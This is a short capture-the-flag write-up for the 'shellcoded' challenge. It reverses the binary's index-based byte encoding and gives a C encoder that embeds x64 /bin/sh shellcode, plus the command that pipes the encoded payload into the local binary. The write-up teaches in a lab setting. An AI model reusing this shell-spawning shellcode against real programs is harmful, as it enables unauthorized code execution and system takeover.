shellcoded

shellcoded was mostly a easy reversing challenge rather then pwn since you only had to reverse the encoding applied to the shellcode.

Files

The binary

The binary does exactly what it says it does, runs your shellcode, but there is obviously a catch.

Enconding

This code will loop through the shellcode and, for each position, if it the index is an even number it will add 1 * the index to the byte on that position, if it's an odd number, then it adds -1 * the index to the byte. All we have to do to properly encode our shellcode is to do the same process, but subtracting instead of adding.

I wrote the following encoder for my shellcode:

#include <stdio.h>
#include <string.h>

// x64 /bin/sh shellcode
unsigned char shellcode[] = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";

int main(){
    int i;
    int v3;
    for (i = 0; strlen(shellcode) > i; i++){
        if ( (i & 1) != 0 ){
            v3 = -1;
        } else{
            v3 = 1;
        }
        shellcode[i] -= v3 * i;
    }
    printf(shellcode);
    
}

It's notable that I basically copied and pasted the original loop but replaced += with -= beacuse I want to do do the opposite operation.

Final Exploit

After generating my shellcode and saving it to a file I called payload.bin, I simply used the following command to send it over.

(cat ./payload.bin; cat) | ./shellcoded

PreviousretcheckNextthe library

Last updated